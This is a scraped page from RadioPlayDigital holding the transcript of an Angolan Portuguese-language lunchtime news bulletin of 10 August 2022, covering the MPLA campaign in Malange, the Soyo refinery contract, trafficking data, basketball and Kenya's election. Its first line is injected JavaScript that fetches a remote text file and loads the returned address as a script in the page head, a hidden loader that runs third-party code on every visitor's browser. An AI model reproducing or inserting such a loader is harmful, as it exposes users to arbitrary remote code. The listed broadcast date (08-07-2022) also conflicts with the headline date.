;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Noticias ao almoço, edição de 10 de Agosto de 2022 | RadioPlayDigital
Noticias ao almoço, edição de 10 de Agosto de 2022

Cabeça de lista do MPLA destaca necessidade do País apostar na industrialização. João Lourenço anuncia nova centralidade para Malange.

AIPEX e Quanten Consortium assinam contrato para construção da refinaria do Soyo.

Angola defronta hoje o Senegal nos quartos de finais do Afrobasket em sub-18.

Quenianos aguardam apreensivos resultados das eleições presidenciais de ontem.

Ponto

Quarta-feira 10 de Agosto. O Faustino Diogo edita às notícias, com técnica de Emanuel Catilina e Galaçio Santana. Apresenta o Pedro Fernandes.

Ponto

Boa tarde,

A catorze dias das eleições os partidos políticos continuam a campanha de mobilização ao voto. Hoje, o candidato e cabeça de lista do MPLA, destacou a necessidade do País apostar na industrialização.

João Lourenço que falava num comício em Malange,  enalteceu o potencial energético desta localidade para a dinamização da indústria nacional.

RD – JL0 2

O cabeça de lista do MPLA destacou também o que se tem feito a nível de produção de cereais em Malange para que Angola seja autossuficiente.

RD – JLO 3

Entre promessas eleitorais, João Lourenço prometeu a construção de uma nova centralidade, conclusão do projecto de 300 mil casas em Malange.

RD – JLO 1

Candidato a Presidente de República e cabeça de lista do MPLA, João Lourenço, hoje no comício que presidiu na província de Malange.

Ainda sobre eleições,  a UNITA apela os cidadãos a votarem com tranquilidade como nos conta o Justino Leandro, que está no Huambo.

RD – JLeandro

… 

Repórter Justino Leandro

E o cabeça de lista da CSAS-CE lançou um apelo aos restantes concorrentes às eleições gerais para que tenham um discurso e acções pacíficas para que o pleito decorra com tranquilidade.

RD-MFernandes

Número um da CASA-CE Manuel Fernandes.

E o plantão LAC segue a campanha eleitoral e analisa o no debate diário as acções dos candidatos e partidos.

O resumo do que esteve em debate hoje é feito pelo jornalista Pedro Fernandes.

RD – PFernandes

Jornalista Pedro Fernandes.

Publicidade

AIPEX e Quanten Consortium assinaram hoje contrato para construção da Refinaria do Soyo

No valor de 3,5 mil milhões de dólares, a futura refinaria terá uma capacidade de processamento de 100 mil barris de petróleo diários e garantirá cerca de 900 empregos directos.

Recorde-se que em Maio deste ano, o consórcio Quanten anunciou que ia investir 3,5 mil milhões de dólares na construção desta refinaria.

Na ocasião, Segun Thomas, presidente do conselho de administração do consórcio e CEO da TGT, adiantou que a empreitada será desenvolvida num período de três anos e meio.

Ponto

O país registou 140 casos de tráfico humano desde 2014, segundo dados oficiais do Ministério da Justiça e dos Direitos Humanos. As principais vítimas deste tráfico foram crianças e mulheres.

Os casos foram notificados em Luanda e nas províncias fronteiriças e segundo secretária de Estado dos Direitos Humanos e Cidadania, Ana Celeste, as redes socias têm sido instrumento neste processo.

RD- ACeleste  

Secretária de Estado dos Direitos Humanos e Cidadania, Ana Celeste e o tráfico humano, que desde 2014, o País registou 140 casos, segundo dados oficiais.

A Associação de Jovens Mulheres Empoderadas está preocupada com o número de casos diários de crianças maltratadas e violentadas sexualmente por adultos.

Mais dados com o repórter Manuel Augusto

RD-MAugusto

Repórter Manuel Augusto

Associação de Jovens Mulheres Empoderadas está preocupada com o número de casos diários de crianças maltratadas e violentadas sexualmente por adultos

Ponto

Do desporto,

A seleção nacional masculina de basquetebol sub-18 defronta hoje o Senegal para os quartos-de-final do Africano da modalidade que decorre no Madagáscar.

Angola procura a meia-final da prova depois da quarta posição conseguida no grupo B, na primeira fase da competição.

Ainda do basquetebol, o 1º de Agosto adiou a festa do Interclub, que está a uma victória do título nacional em sénior feminino.

As militares venceram ontem as polícias por 77-63, impedindo que a equipa do Ministério do Interior fizesse a sua terceira victória na final do play-off a melhor de cinco jogos.

Nesta altura o Interclub tem duas victórias e o 1º de Agosto Uma. O quarto jogo realiza-se hoje a noite e caso às senhoras do Rio Seco voltem a ganhar, o título será decidido na finalíssima, ou seja no quinto e último jogo da final.

Mas se o Interclub vencer hoje, conquista o título nacional em basquetebol sénior feminino.

Ponto

Na política Internacional,

Vinte e dois milhões de quenianos votaram ontem para eleger o novo Presidente do País.

Rail Odinga ou William Rutto, actual vice-presidente, será o substituto de Uhru Kenyatta.

José Octávio Serra Van-Dúnemn na qualidade de observador da União Africana, disse à LAC que e os eleitores mostram-se preocupados como que poderá acontecer depois da divulgação dos resultados.

RD – JOSVan-Dúnem 2

O académico acrescenta ainda que dada a disputa entre os dois candidatos, poderá haver uma segunda volta.

RD – JOSVan-Dúnem 1

Académico José Octávio Serra Van-Dúnemn que foi observador da União Africana nas eleições de ontem no Quénia.

O Governo norte-americano destacou a importância “geoestratégica” do continente africano ao lançar uma nova estratégia de parceria entre a África Subsaariana e os Estados Unidos da América, segundo fontes oficiais.

“A nossa estratégia está enraizada no reconhecimento de que a África Subsaariana é uma grande força geopolítica, que moldou o nosso passado, está a moldar o nosso presente e moldará o futuro. É uma estratégia que reflecte a complexidade da região, a sua diversidade, poder e influência e que se concentra no que faremos com nações e povos africanos, não para nações e povos africanos”, o secretário de Estado Antony Blinken num discurso feito em Pretória, capital da África do Sul, e divulgado hoje pelo Departamento de Estado norte-americano.

A ameaça do grupo extremista Estado Islâmico (EI) cresce a cada dia em África e o continente pode ser “o futuro do califado”, alertou um especialista em segurança africano no Conselho de Segurança da ONU.

Martin Ewi disse que o Estado Islâmico “expandiu a sua influência além da medida” em África, com pelo menos 20 países a sentirem directamente a actividade do grupo extremista e mais de 20 outros “a serem usados para logística e para mobilizar fundos e outros recursos”.

 

 

Data de Emissão: 08-07-2022 às 12:30
Género(s): Noticiário
 

Relacionados